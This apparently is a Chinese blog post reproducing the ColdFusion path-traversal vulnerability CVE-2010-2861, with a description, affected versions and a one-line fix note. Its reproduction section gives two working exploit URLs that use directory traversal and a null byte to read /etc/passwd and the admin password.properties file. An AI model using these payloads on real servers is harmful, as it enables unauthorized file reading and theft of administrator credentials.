当前位置:网站首页>coldfusion文件读取漏洞(CVE-2010-2861)
coldfusion文件读取漏洞(CVE-2010-2861)
2022-07-31 01:32:00 【1stPeak】
声明:本人所有文章均为技术分享,请勿非法用于其他用途,否则后果自负。
漏洞描述
CVE-2010-2861
Adobe ColdFusion是美国Adobe公司的一款动态Web服务器产品,其运行的CFML(ColdFusion Markup Language)是针对Web应用的一种程序设计语言。
Adobe ColdFusion 8、9版本中存在一处目录穿越漏洞,可导致未授权的用户读取服务器任意文件。
漏洞影响
ColdFusion MX6 6.1 base patches
ColdFusion MX7 7,0,0,91690 base patches
ColdFusion MX8 8,0,1,195765 base patches
ColdFusion MX8 8,0,1,195765 with Hotfix4
漏洞复现
1、直接访问http://your-ip:8500/CFIDE/administrator/enter.cfm?locale=…/…/…/…/…/…/…/…/…/…/etc/passwd%00en,即可读取文件/etc/passwd
2、读取后台管理员密码http://your-ip:8500/CFIDE/administrator/enter.cfm?locale=…/…/…/…/…/…/…/lib/password.properties%00en
解密password
漏洞修复
打补丁、升级版本
边栏推荐
- Can deep learning solve the parameters of a specific function?
- 【flask入门系列】Flask-SQLAlchemy的使用
- Xiaohei's leetcode journey: 117. Fill the next right node pointer of each node II
- 蓝牙mesh系统开发三 Ble Mesh 配网器 Provisioner
- pycharm重命名后无法运行(报错: can‘t open file......No such file or directory)
- 35. 反转链表
- case语句的综合结果,你究竟会了吗?【Verilog高级教程】
- 【网络安全】文件上传靶场通关(1-11关)
- System design. Short chain system design
- Chi-square distribution of digital image steganography
猜你喜欢
ShardingSphere's public table combat (7)
一万了解 Gateway 知识点
ShardingSphere's unsharded table configuration combat (6)
16、注册中心-consul
JPEG Steganalysis of Digital Image Steganography
The difference between 4G communication module CAT1 and CAT4
"Real" emotions dictionary based on the text sentiment analysis and LDA theme analysis
1.非类型模板参数 2.模板的特化 3.继承讲解
软件测试工作3年了,谈谈我是如何从刚入门进阶到自动化测试的?
Word 表格跨页,仍然显示标题
随机推荐
Problem record in the use of TypeScript
typescript13 - type aliases
使用PageHelper实现分页查询(详细)
勾股数元组 od js
软件测试工作3年了,谈谈我是如何从刚入门进阶到自动化测试的?
MySql的安装配置超详细教程与简单的建库建表方法
Know what DTU is 4GDTU equipment
观察者(observer)模式(一)
android的webview缓存相关知识收集
Word 表格跨页,仍然显示标题
仿牛客网项目总结
网站频繁出现mysql等数据库连接失败等信息解决办法
35. 反转链表
黄东旭:TiDB的优势是什么?
《实战》基于电商领域的词性提取及其决策树模型建模
MySQL的安装教程(嗷嗷详细,包教包会~)
PDF 拆分/合并
The level of ShardingSphere depots in actual combat (4)
16、注册中心-consul
太阳能板最大面积 od js